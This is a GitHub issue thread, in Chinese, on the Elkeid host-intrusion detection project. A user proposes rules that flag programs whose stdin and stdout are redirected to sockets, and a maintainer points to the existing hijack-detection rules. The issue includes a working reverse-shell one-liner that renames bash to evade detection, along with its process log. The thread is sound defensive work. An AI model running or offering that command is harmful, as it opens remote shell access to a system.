Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

判断所有程序的stdin,stdout重定向,避免被绕过 #5

Closed
wcc526 opened this issue Jan 19, 2022 · 1 comment
Closed

判断所有程序的stdin,stdout重定向,避免被绕过 #5

wcc526 opened this issue Jan 19, 2022 · 1 comment

Comments

@wcc526
Copy link

wcc526 commented Jan 19, 2022
edited

麻烦评估下这个 规则改动,

#4

cp /bin/bash /tmp/apache;/tmp/apache -i >& /dev/tcp/10.71.5.222/666 0>&1

{
"bootTime":"2022-01-19 18:48:20.000",
"cmdline":"/tmp/apache -i",
"cwd":"/",
"exe":"/tmp/apache",
"fd_num":"3",
"name":"apache",
"pid":"88184",
"ppid":"50250",
"r_addr_ip":"10.71.5.222",
"r_addr_port":"666",
"session":"50250",
"stderr":"socket:[583190616]",
"stdin":"socket:[583190616]",
"stdout":"socket:[583190616]",
"terminal":"/pts/0",
"username":"root"
},
@whitelez
Copy link

whitelez commented Jan 20, 2022
edited

Hi,
这个问题非常赞,类似情况的绕过需要作为规则集的一部分进行检出。
事实上我们也是这么做的,而当前开源的规则集只是我们实际上商用版本的一小部分
这里建议您可以自行添加,参考开源规则中的binary_file_hijack_detect 系列将对类似的文件替换进行修改。
如果有好的结论可以提交merge request,我们会协助测试并合并进来

感谢您的关注
Elkeid Team

@EBWi11 EBWi11 closed this as completed Mar 8, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@wcc526 @whitelez @EBWi11